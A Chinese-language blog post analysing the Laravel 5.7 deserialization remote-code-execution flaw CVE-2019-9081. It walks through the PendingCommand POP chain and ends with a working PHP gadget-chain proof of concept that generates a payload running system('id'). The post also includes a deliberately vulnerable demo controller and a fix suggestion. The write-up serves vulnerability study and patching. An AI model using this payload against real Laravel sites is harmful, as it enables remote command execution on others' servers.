<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.2">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.2" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="laravelv5.7反序列化rce(CVE-2019-9081)laravel 5.7是一款基于php 7.1.3之上运行的优秀php开发框架。本周对于laravel v5.7进行初步审计学习。发掘到一个laravel核心包中的一个反序列化rce漏洞。只要反序列化的内容可控即可触发该漏洞。但遗憾的是，我没能在laravel框架中找到合适的触发点，因此需要对基于laravel v5.7框架进行二次">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2019-9081(laravelv5.7反序列化rce)">
<meta property="og:url" content="https://idongxia.github.io/2018/04/03/laravel/index.html">
<meta property="og:site_name" content="idongxia">
<meta property="og:description" content="laravelv5.7反序列化rce(CVE-2019-9081)laravel 5.7是一款基于php 7.1.3之上运行的优秀php开发框架。本周对于laravel v5.7进行初步审计学习。发掘到一个laravel核心包中的一个反序列化rce漏洞。只要反序列化的内容可控即可触发该漏洞。但遗憾的是，我没能在laravel框架中找到合适的触发点，因此需要对基于laravel v5.7框架进行二次">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2018-04-03T04:00:00.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2019-9081(laravelv5.7反序列化rce)">
<meta name="twitter:description" content="laravelv5.7反序列化rce(CVE-2019-9081)laravel 5.7是一款基于php 7.1.3之上运行的优秀php开发框架。本周对于laravel v5.7进行初步审计学习。发掘到一个laravel核心包中的一个反序列化rce漏洞。只要反序列化的内容可控即可触发该漏洞。但遗憾的是，我没能在laravel框架中找到合适的触发点，因此需要对基于laravel v5.7框架进行二次">





  
  
  <link rel="canonical" href="https://idongxia.github.io/2018/04/03/laravel/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>CVE-2019-9081(laravelv5.7反序列化rce) | idongxia</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">idongxia</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Navigationsleiste an/ausschalten">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Startseite</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archiv</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://idongxia.github.io/2018/04/03/laravel/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="idongxia">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="idongxia">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">CVE-2019-9081(laravelv5.7反序列化rce)

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Erstellt: 2018-04-03 12:00:00" itemprop="dateCreated datePublished" datetime="2018-04-03T12:00:00+08:00">2018-04-03</time>
            

            
          </span>

          

          
            
            
              
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
            
                <span class="post-meta-item-text">Kommentare: </span>
                <a href="/2018/04/03/laravel/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2018/04/03/laravel/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="laravelv5-7反序列化rce-CVE-2019-9081"><a href="#laravelv5-7反序列化rce-CVE-2019-9081" class="headerlink" title="laravelv5.7反序列化rce(CVE-2019-9081)"></a>laravelv5.7反序列化rce(CVE-2019-9081)</h1><p>laravel 5.7是一款基于php 7.1.3之上运行的优秀php开发框架。本周对于laravel v5.7进行初步审计学习。发掘到一个laravel核心包中的一个反序列化rce漏洞。只要反序列化的内容可控即可触发该漏洞。但遗憾的是，我没能在laravel框架中找到合适的触发点，因此需要对基于laravel v5.7框架进行二次开发的cms进行再次审计，寻找可控的反序列化点，才能触发该漏洞。</p>
<h2 id="漏洞详情"><a href="#漏洞详情" class="headerlink" title="漏洞详情"></a>漏洞详情</h2><h3 id="漏洞demo"><a href="#漏洞demo" class="headerlink" title="漏洞demo"></a>漏洞demo</h3><p>由于我没有找到laravel框架触发反序列化的点，因此我们需要自己构造一个漏洞demo，用作poc的验证。</p>
<p>在routes/web.php文件中添加这样一条路由记录:Route::get(‘/index’, ‘TaskController@index’);</p>
<p>接下来在app/Http/Controllers文件夹下创建文件TaskController.php，源码如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace App\Http\Controllers;</span><br><span class="line"></span><br><span class="line">class TaskController</span><br><span class="line">&#123;</span><br><span class="line">    public function index()&#123;</span><br><span class="line">        unserialize($_GET[&apos;p&apos;]);</span><br><span class="line">        return &quot;22222&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>漏洞分析<br>首先我们来对比一下laravel v5.6和laravel v5.7下vendor/laravel/framework/src/Illuminate/Foundation/Testing文件夹中的区别：<br>可以看到在v5.7版本中多了一个PendingCommand.php文件。我们再来看看官方文档对于这个文件的解释。<br>其主要功能是用作命令执行，并且获取输出内容。<br>阅读代码我们可以看到PendingCommand.php文件定义了PendingCommand类，该类存在<strong>destruct方法，忘了哪位大牛说过，</strong>destruct永远是反序列化漏洞的最佳攻击点。而在PendingCommand类的<strong>destruct方法中调用了该类的run方法。在run方法的头顶，赫然写着Execute the command.。攻击思路很明显了，通过反序列化触发PendingCommand类的</strong>destruct析构函数，进而调用其run方法实现代码执行。接下来就要开始构造pop链。<br>在构造payload之前，我先简单的介绍一下PendingCommand类中的几个重要属性：<br>$this-&gt;app;         //一个实例化的类 Illuminate\Foundation\Application<br>$this-&gt;test;        //一个实例化的类 Illuminate\Auth\GenericUser<br>$this-&gt;command;     //要执行的php函数 system<br>$this-&gt;parameters;  //要执行的php函数的参数  array(‘id’)<br>我们传入payload看看具体流程走向。<br>将我们构造好的序列化数据通过参数p传入，查看调用栈可以看到，在进行反序列化时，成功进入PendingCommand类的析构函数。并且这里的$this-&gt;hasExecuted默认定义就是false。导致我们很顺利进入$this-&gt;run()方法。run方法的代码如下:<br>我们首先需要进入$this-&gt;mockConsoleOutput()方法。这个方法的也是困扰了我很久，差一点没能绕过这个方法。最后是在吃完晚饭之后，灵光一现突然想到bypass的方法。我们跟进看看代码逻辑。<br>在$this-&gt;mockConsoleOutput()使用Mockery::mock实现对象模拟，具体如何实现我们不去关心，目前的首要任务是顺利走通这段代码。我们将关注点放在$this-&gt;createABufferedOutputMock()，继续跟进$this-&gt;createABufferedOutputMock()函数。<br>这里又进行一次对象模拟，但是着不重要，我们重点看我打上箭头的地方。要求获取$this-&gt;test这个类中的expectedOutput属性，并且遍历该属性。按道理来说$this-&gt;test这个类应该存在expectedOutput属性，我们才能顺利地执行下文代码。很不幸，在我们可以实例化的类中，没有一个类存在expectedOutput属性。只有一些测试类才有这个属性。这也是困扰我很久的地方。<br>但我们仔细看看这段代码会发现，我们需要的只是一个返回内容而已，只需要有返回内容，使得代码进入循环流程我们便能走通这段代码。因此我们可以利用<strong>get魔术方法来返回我们需要的内容。我这里选取的是Illuminate\Auth\GenericUser类。其</strong>get魔术方法的逻辑如下：<br>而$this-&gt;attributes通过反序列化是可控的，因此我们可以构造$this-&gt;attributes键名为expectedOutput的数组。这样一来$this-&gt;test-&gt;expectedOutput就会返回$this-&gt;attributes中键名为expectedOutput的数组。$this-&gt;createABufferedOutputMock()的代码也就顺利走通了。<br>接下来回到$this-&gt;mockConsoleOutput()方法，可以看到这里有一段和$this-&gt;createABufferedOutputMock()中相似的代码，我们的目的只是走通这段代码，进入下面的流程，因此不需要关心他具体的实现，只要能顺利执行，不报错，不产生异常就行。使用和$this-&gt;createABufferedOutputMock()同样的绕过办法，在$this-&gt;attributes中定义键名为expectedQuestions的数组即可。<br>之后，我们继续运行就能走出$this-&gt;mockConsoleOutput()方法。接下来，就是最关键的产生漏洞的代码点。<br>$exitCode = $this-&gt;app[Kernel::class]-&gt;call($this-&gt;command, $this-&gt;parameters);。<br>这行代码相当令人费解，我为了更加直观的表述，新增两个变量。<br>$aaa=Kernel::class;<br>$fff=$this-&gt;app[Kernel::class];<br>$exitCode = $this-&gt;app[Kernel::class]-&gt;call($this-&gt;command, $this-&gt;parameters);<br>Kernel::class在这里是一个固定值Illuminate\Contracts\Console\Kernel，我们不去管他。重点是$this-&gt;app[Kernel::class]这句代码。跟踪这句代码，我们会得到以下调用栈：<br>通过整体跟踪，猜测开发者的本意应该是实例化Illuminate\Contracts\Console\Kernel这个类，但是在getConcrete这个方法中出了问题，导致可以利用php的反射机制实例化任意类。问题出在vendor/laravel/framework/src/Illuminate/Container/Container.php的704行，可以看到这里判断$this-&gt;bindings[$abstract])是否存在，若存在则返回$this-&gt;bindings[$abstract][‘concrete’]。</p>
<p>$bindings是vendor/laravel/framework/src/Illuminate/Container/Container.php文件中Container类中的属性。因此我们只要寻找一个继承自Container的类，即可通过反序列化控制 $this-&gt;bindings属性。而Illuminate\Foundation\Application恰好继承自Container类，这就是我选择Illuminate\Foundation\Application对象放入$this-&gt;app的原因。由于我们已知$abstract变量为Illuminate\Contracts\Console\Kernel，所以我们只需通过反序列化定义Illuminate\Foundation\Application的$bindings属性存在键名为Illuminate\Contracts\Console\Kernel的二维数组就能进入该分支语句，返回我们要实例化的类名。在这里返回的是Illuminate\Foundation\Application类。<br>之后便步出$this-&gt;getConcrete方法。使用$this-&gt;isBuildable方法，判断是否可进行实例化。<br>具体判断逻辑如下：<br>很明显我们现在不满足条件，因此进入$this-&gt;make方法，同样的流程再循环一遍。第二遍循环时，在$this-&gt;getConcrete环节还是获取我们定义的Illuminate\Foundation\Application，这样一来使得$this-&gt;isBuildable中的$concrete === $abstract条件成立。因此我们进入$this-&gt;build方法。<br>在$this-&gt;build方法中，就能看到使用ReflectionClass反射机制，实例化我们传入的类。<br>成功实例化类，最后逐层返回我们创建的对象。最后我们可以知道通过我们传入的payload，$this-&gt;app[Kernel::class]最终返回的内容就是我们创建的Illuminate\Foundation\Application类的对象。<br>继续往下跟踪，已经接近胜利了。在返回一个对象之后，又调用了call方法。实际上Illuminate\Foundation\Application类没有call方法，但是它的父类Illuminate\Container\Container是有call方法的。因此，在这里会直接跳转到Illuminate\Container\Container类中的call方法。<br>跟进BoundMethod对象的call方法。<br>不满足第一个分支语句，直接进入第二行。前面的static::callBoundMethod只是判断我们的$callback是否为数组。这个不重要，我们关注后面的匿名函数。这个匿名函数直接调用call_user_func_array，并且第一个参数我们可控，参数值为system，第二个参数由static::getMethodDependencies方法返回。跟进static::getMethodDependencies方法看看。<br>static::getCallReflector($callback)这句用于利用反射获取$callback的对象，继续往下执行static::addDependencyForCallParameter，会对$callback的对象添加一些参数，但是这些不重要。最后一行才是关键。<br>最后将我们传入的$parameters参数数组和$dependencies数组合并，$dependencies数组为空。<br>最后在BoundMethod对象的call方法中我们相当于执行了以下代码:<br>call_user_func_array(‘system’,array(‘id’))<br>pop链构造成功，get代码执行。之后就很顺畅，一路输出执行内容，完美ending！！！！<br>最后附上漏洞证明：<br>需要注意的一点，该漏洞只对laravel v5.7版本有效。laravel v5.6不存在PendingCommand.php文件。<br>POC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//gadgets.php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Illuminate</span>\<span class="title">Foundation</span>\<span class="title">Testing</span>&#123;</span><br><span class="line">	<span class="title">class</span> <span class="title">PendingCommand</span>&#123;</span><br><span class="line">		<span class="title">protected</span> $<span class="title">command</span>;</span><br><span class="line">		<span class="keyword">protected</span> $parameters;</span><br><span class="line">		<span class="keyword">protected</span> $app;</span><br><span class="line">		<span class="keyword">public</span> $test;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($command, $parameters,$class,$app)</span></span></span><br><span class="line"><span class="function">	    </span>&#123;</span><br><span class="line">	        <span class="keyword">$this</span>-&gt;command = $command;</span><br><span class="line">	        <span class="keyword">$this</span>-&gt;parameters = $parameters;</span><br><span class="line">	        <span class="keyword">$this</span>-&gt;test=$class;</span><br><span class="line">	        <span class="keyword">$this</span>-&gt;app=$app;</span><br><span class="line">	    &#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Illuminate</span>\<span class="title">Auth</span>&#123;</span><br><span class="line">	<span class="title">class</span> <span class="title">GenericUser</span>&#123;</span><br><span class="line">		<span class="title">protected</span> $<span class="title">attributes</span>;</span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">(array $attributes)</span></span>&#123;</span><br><span class="line">	        <span class="keyword">$this</span>-&gt;attributes = $attributes;</span><br><span class="line">	    &#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Illuminate</span>\<span class="title">Foundation</span>&#123;</span><br><span class="line">	<span class="title">class</span> <span class="title">Application</span>&#123;</span><br><span class="line">		<span class="title">protected</span> $<span class="title">hasBeenBootstrapped</span> = <span class="title">false</span>;</span><br><span class="line">		<span class="keyword">protected</span> $bindings;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($bind)</span></span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;bindings=$bind;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//chain.php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"gadgets.php"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize(<span class="keyword">new</span> Illuminate\Foundation\Testing\PendingCommand(<span class="string">"system"</span>,<span class="keyword">array</span>(<span class="string">'id'</span>),<span class="keyword">new</span> Illuminate\Auth\GenericUser(<span class="keyword">array</span>(<span class="string">"expectedOutput"</span>=&gt;<span class="keyword">array</span>(<span class="string">"0"</span>=&gt;<span class="string">"1"</span>),<span class="string">"expectedQuestions"</span>=&gt;<span class="keyword">array</span>(<span class="string">"0"</span>=&gt;<span class="string">"1"</span>))),<span class="keyword">new</span> Illuminate\Foundation\Application(<span class="keyword">array</span>(<span class="string">"Illuminate\Contracts\Console\Kernel"</span>=&gt;<span class="keyword">array</span>(<span class="string">"concrete"</span>=&gt;<span class="string">"Illuminate\Foundation\Application"</span>))))));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>运行chain.php文件即可得到payload，将payload传入p参数即可。</p>
<p>修复建议<br>最有效的方法是删除__destruct中的$this-&gt;run()。</p>
<p>参考链接</p>
<p>：<a href="https://webcache.googleusercontent.com/search?q=cache:ThaeDUIm000J:https://laworigin.github.io/2019/02/21/" target="_blank" rel="noopener">https://webcache.googleusercontent.com/search?q=cache:ThaeDUIm000J:https://laworigin.github.io/2019/02/21/</a></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/04/02/java/" rel="next" title="反序列化">
                <i class="fa fa-chevron-left"></i> 反序列化
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/05/05/gdb/" rel="prev" title="some useful gdb skills">
                some useful gdb skills <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">idongxia</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#laravelv5-7反序列化rce-CVE-2019-9081"><span class="nav-number">1.</span> <span class="nav-text">laravelv5.7反序列化rce(CVE-2019-9081)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞详情"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞详情</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞demo"><span class="nav-number">1.1.1.</span> <span class="nav-text">漏洞demo</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">idongxia</span>

  

  
</div>


  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Design – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.1.2</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.2"></script>

  <script src="/js/motion.js?v=7.1.2"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.2"></script>



  
  <script src="/js/scrollspy.js?v=7.1.2"></script>
<script src="/js/post-details.js?v=7.1.2"></script>



  


  <script src="/js/next-boot.js?v=7.1.2"></script>


  

  

  

  
  

<script src="//cdn1.lncld.net/static/js/3.11.1/av-min.js"></script>



<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'utzKntLleFpYpbLMukFBuRNb-gzGzoHsz',
    appKey: 'QzvmcivNyJTepWaD1Fuwpuci',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false,
    lang: '' || 'zh-cn'
  });
</script>




  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
